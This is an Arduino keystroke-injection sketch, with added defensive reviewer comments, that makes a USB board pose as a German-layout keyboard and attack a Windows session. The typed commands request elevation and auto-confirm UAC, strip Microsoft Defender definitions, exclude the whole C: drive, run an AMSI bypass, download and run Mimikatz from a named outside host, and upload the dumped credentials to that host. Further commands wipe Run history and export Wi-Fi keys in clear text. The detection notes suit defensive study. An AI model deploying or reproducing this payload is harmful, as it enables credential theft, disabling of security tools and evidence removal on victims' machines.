// Keystroke-injection sketch: the board presents itself as a USB keyboard with
// a German (de_DE) layout and types a fixed command sequence into a Windows
// session. The whole sequence lives in setup(), so it runs once per power-up.
//
// Reviewer notes (defensive reading of this listing):
//  - Stages visible below: elevation request via the Run dialog, Microsoft
//    Defender tampering, an AMSI-related string, an in-memory download of a
//    credential-dumping script with upload of its output, Run-history cleanup,
//    and a Wi-Fi profile export with clear-text keys.
//  - Every stage is typed blind with fixed delays. The sketch never reads
//    anything back from the host, so it cannot tell whether a step succeeded.
//  - Telemetry worth having for this pattern: process creation with command
//    lines (Security 4688 or equivalent), PowerShell script block logging
//    (4104), the Defender operational log (5007 = configuration changed), and
//    outbound HTTP logs for the host named in the download string.
//  - Preventive controls: USB device-installation restrictions for unknown
//    HID devices, UAC set to prompt for credentials rather than consent,
//    Defender Tamper Protection / centrally managed policy, LSA protection or
//    Credential Guard, and egress filtering.
#include  // header name was lost when the page was extracted
#define KEY_DELAY 50 //delay between keystrokes for slow computers

// Runs the typed sequence once at start-up. Takes no input and returns
// nothing; its only effect is the keystrokes sent to the host.
void setup() {
  // Keyboard.begin();
  Keyboard.begin(KeyboardLayout_de_DE);

  //I recommend that you leave a short delay before start while prototyping.
  //It will give you some time to reprogram a board before it starts typing.
  // Nothing is typed during these first 20 seconds.
  delay(20000);

  // normal program, only run it once at startup

  // Windows + R
  // Opens the Run dialog. Text entered there is recorded under the RunMRU
  // registry key that a later step tries to clear.
  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press('r');
  delay(KEY_DELAY);
  Keyboard.releaseAll();
  delay(700);

  // Start cmd as Administrator
  // Detection: powershell.exe launched from the Run dialog that immediately
  // starts an elevated cmd.exe (-Verb runAs) is unusual for interactive use.
  Keyboard.println("powershell Start-Process cmd -Verb runAs");
  delay(1500);

  // press ALT + j to confirm execution as Administrator
  // Mitigation: a consent-only prompt can be answered with a single keystroke.
  // A standard-user session, or a UAC policy that asks for credentials,
  // cannot be, because the sketch types no password.
  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.press('j');
  delay(KEY_DELAY);
  Keyboard.releaseAll();
  delay(1500);

  // If no UAC enabled, we printed j on the console, let's
  // initiate a few CTRL+C's to cancel that and get a fresh
  // prompt...
  Keyboard.press(KEY_LEFT_CTRL);
  Keyboard.press('c');
  delay(KEY_DELAY);
  Keyboard.releaseAll();
  delay(200);
  Keyboard.press(KEY_LEFT_CTRL);
  Keyboard.press('c');
  delay(KEY_DELAY);
  Keyboard.releaseAll();
  delay(300);

  // Disable Defender; wait a bit longer, because recent only `ershell ...` was printed
  // Detection: any interactive invocation of MpCmdRun.exe with
  // -RemoveDefinitions, or of Set-MpPreference with a -Disable* switch, is a
  // high-signal tampering indicator. Defender logs configuration changes as
  // event 5007 in its operational log.
  Keyboard.println("\"C:\\program files\\windows defender\\mpcmdrun.exe\" -RemoveDefinitions -All Set-MpPreference -DisableOAVProtection $true");
  delay(200);

  // Start powershell; wait longer because the OS has to bring another window to foreground
  Keyboard.println("powershell");
  delay(200);

  // Add C: to Defender exclusion list
  // Detection: an exclusion covering a whole drive root should never appear on
  // a managed endpoint. Alert on new ExclusionPath entries and audit the
  // exclusion list centrally.
  Keyboard.println("Add-MpPreference -ExclusionPath \"C:\\\"");
  delay(200);

  // AMSI-related string. The AmsiUtils / amsiInitFailed identifiers are widely
  // signatured and are recorded by PowerShell script block logging (4104)
  // when it is enabled.
  Keyboard.println("\"[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed'.'NonPublic,Static').SetValue($null,$true)\"");
  delay(200);

  // Leaves the nested PowerShell session started above.
  Keyboard.println("exit");
  delay(400);

  // Download and execute mimikatz; then upload result log
  // Both transfers use plain HTTP to the same host, so proxy or firewall logs
  // show the script fetch and the upload in clear text. Host-side indicators:
  // IEX combined with Net.WebClient.DownloadString on a command line, and
  // access to LSASS memory by a PowerShell process.
  // Mitigation: LSA protection or Credential Guard, and blocking outbound HTTP
  // from workstations to unapproved hosts.
  Keyboard.println("powershell \"IEX (New-Object Net.WebClient).DownloadString('http://bor.oe7drt.com/im.ps1');$output=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://bor.oe7drt.com/imrx.php',$output)\"");
  delay(6000);

  // Clear run history
  // Anti-forensics step: removes every value under the user's RunMRU key.
  // It does not touch process-creation or PowerShell logs, which is why those
  // should be forwarded off the host.
  Keyboard.println("powershell \"Remove-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU' -Name '*' -ErrorAction SilentlyContinue\"");
  delay(400);

  // show wlan passwords
  // Exports saved Wi-Fi profiles with their keys in clear text. Nothing typed
  // afterwards sends that output anywhere, so the exported profile files
  // (presumably XML in the working directory; confirm on the host) remain
  // as an artifact for responders.
  Keyboard.println("netsh wlan export profile key=clear");
  delay(8000);

  // exit cmd window
  Keyboard.println("exit");
  delay(KEY_DELAY);
  Keyboard.end();
}

// Intentionally empty: nothing is typed after setup() returns.
void loop() {
  // do nothing in loop() -- or should we restart the computer? or lock it? or delete something?
  // or start a fork bomb etc...
}